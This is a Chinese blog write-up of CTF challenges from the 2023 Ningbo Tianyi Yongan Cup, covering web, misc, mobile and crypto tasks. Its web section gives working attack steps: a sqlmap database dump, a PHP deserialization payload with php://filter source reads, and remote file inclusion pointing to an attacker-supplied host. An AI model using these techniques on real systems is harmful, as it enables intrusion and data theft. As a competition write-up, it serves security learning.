iami233
iami233
文章175
标签37
分类4

文章分类

文章归档

天一永安杯宁波市网络安全大赛 2023 Writeup

天一永安杯宁波市网络安全大赛 2023 Writeup

因为线下不报差旅,简单划划水(绝对不是因为打不进线下!😫)

Web

Query

Query suitable data and get your flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST http://37a6852ac4faf290.node.nsctf.cn/login.php HTTP/1.1
Host: 37a6852ac4faf290.node.nsctf.cn
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://37a6852ac4faf290.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://37a6852ac4faf290.node.nsctf.cn/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8lvsj65t588pem3sqkj1m24md6
Connection: close

username=1&password=*

直接使用 sqlmap 一把梭即可

1
python .\sqlmap.py -r post.txt -D 'ctf' -T 'f111' --dump

Deserialization

Construct your object

访问环境查看源代码发现代码片段,要求传递 $read$input,其中 $read 不能包含 fl4g

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<!--
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
include($read);
$input = unserialize($input);
$input2 = clone $input;
$input2->position = "route.php";
}
else{
die("NONONO!");
}
-->


NONONO!

根据已知逻辑,直接构造,首先使用伪协议先读取 route.php

1
read=php://filter/convert.base64-encode/resource=route.php&input=123

得到文件源码

1
2
3
4
5
6
<h1>Here can you find the position of the flag!</h1>

<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>

文件中又提到了 h1nt.php 接着读取

1
2
3
4
5
6
7
8
9
10
<?php
class test
{
public $position;
public function __clone(){
echo file_get_contents($this->position);
return $this->position;
}
}
?>

逻辑很简单直接根据逻辑构造代码

1
2
3
4
5
6
7
8
9
10
<?php
class test
{
public $position;
}

$f = new test();
$f->position = 'f14g.php';
var_dump(serialize($f));
// O:4:"test":1:{s:8:"position";s:8:"f14g.php";}

因为我们需要触发反序列化,所以 read 需要读取 h1nt.php ,最终传递的参数为

1
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:8:"f14g.php";}

CodeCheck

Check this code!

查看网页源代码得到部分代码片段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}-->
NONONO

逻辑很简单,要求 a 读取的内容等于 flag ,然后 bc 内容不相同,直接远程文件包含+伪协议

1
2
3
4
5
http://e644ab7e50751e44.node.nsctf.cn/
?a=http://your_ip/1.txt
&b=http://your_ip/1.txt
&c=flag
&d=php://filter/convert.base64-encode/resource=index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}-->
<?php
$flag = "flag{flag{a3722bcf95f64d05aab15a41a000fdfb}}";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
var_dump($_GET['c']);
var_dump(file_get_contents($_GET['b']));
die("yes");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}
?>

Misc

zip

Simple Compress

打开附件,文件备注了给了提示

1
The art of 0 and 1, and it will remain shorter than 9.

直接使用脚本列出所有可能,爆破得到密码 01001101

1
2
3
4
5
6
7
8
import itertools

digits = ['0', '1']
combinations = [''.join(combination) for combination in itertools.product(digits, repeat=9)]

with open('pass.txt', 'w') as f:
for combination in combinations:
f.write(combination + '\n')

SimpleDocument

More than image.

分离出一个 PDF 直接全选复制得到 flag(默认flag设置为了白色字体,所以看不到

BeautifulImage

Cool Mountain

lsb隐写,0通道存在一段base64

1
ZmxhZ3syNGVkZDc2ZTQ2YzIyYzY1Y2M1YmRkZDNjNmU0ZjZmM30=

Mobile

peacock

peacock

jadx 看半天没思路,直接尝试反编译 so 文件,发现是 base64变表,直接解密即可

image-20230520132350827

image-20230520132416298

Crypto

secret

好神奇的密文!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

import gmpy2
import libnum

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28

n = p * q
phi = (p - 1) * (q - 1)

t = gmpy2.gcd(e, phi)
t1 = e // t
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)
print(mt1)
s, m = gmpy2.iroot(mt1, t)
print(s)
print(libnum.n2s(int(s)))

Morse的笔记本

1
2
3
你知道吗。今天我竟然在街上捡到了100元钞票,我当时简直惊呆了,太幸运了。于是我赶紧把钞票捡起来!心里面十分高兴。走了一段路之后,我看见了一个老奶奶在街角卖菜!我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去!把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐!因为我知道。这个世界因为有我们每一个人的善良而变得更美好,今天天气真的很好,我和小丽!小明越好一起去公园玩,在公园里,我们看见了一只可爱的小松鼠,它在树枝上蹦来蹦去!十分活泼可爱。我们还看见了一些漂亮的花朵,它们在微风中轻轻摇曳。像在跳舞一样!我们一边走一边欣赏,一边笑一边玩。真是度过了一个美好的下午。回家的路上!我感到心情特别愉悦。因为我知道。只要心怀善意!天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐!人生路上,有时候你会遇到阻碍。但只要你努力地挑战,不放弃。就能突破困境!实现自己的梦想,所以,不管你遇到什么样的挑战,都不要气馁!坚持下去,你一定会收获成功的喜悦。因为!只有那些坚定自己方向的人,才能走得更远,更自信。当我们遭遇挫折和失败的时候!不要被打倒。要用心去学习,从失败中汲取经验教训。然后重新站起来!更加坚定地追求自己的目标。成功并不是一蹴而就的,需要我们付出长久的努力和坚持!但只要我们一直前进,终究会到达成功的彼岸!所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。

mesr{997a9k414dx8m4061u74v15m1y32201k}

又是脑洞题目,观察发现只存在 ,.! 这三个符号,直接结合题目名转成摩斯电码

1
2
.--. .- ... ... .-- --- .-. -.. .. ... -.-. --- -. --. .-. .- - ...
// PASSWORDISCONGRATS

维吉尼亚密码解密之后凯撒密码解密得到 flag

image-20230520132826804

rsa

用了什么数学知识嘞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import gmpy2

n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439

R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
f = 2 * a * x + 1
f_monic = f.monic()

ans = f_monic.small_roots(X=2 ** 60, beta=0.4, epsilon=0.05)
g = ans[0]

d = gmpy2.invert(gmpy2.mpz(65537), gmpy2.mpz((a - 1) * (g - 1)))
m = gmpy2.powmod(gmpy2.mpz(c), d, gmpy2.mpz(a * g))
plaintext = bytes.fromhex(hex(int(m))[2:])
plaintext
本文作者:iami233
本文链接:https://5ime.cn/nb-infosec-2023.html
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可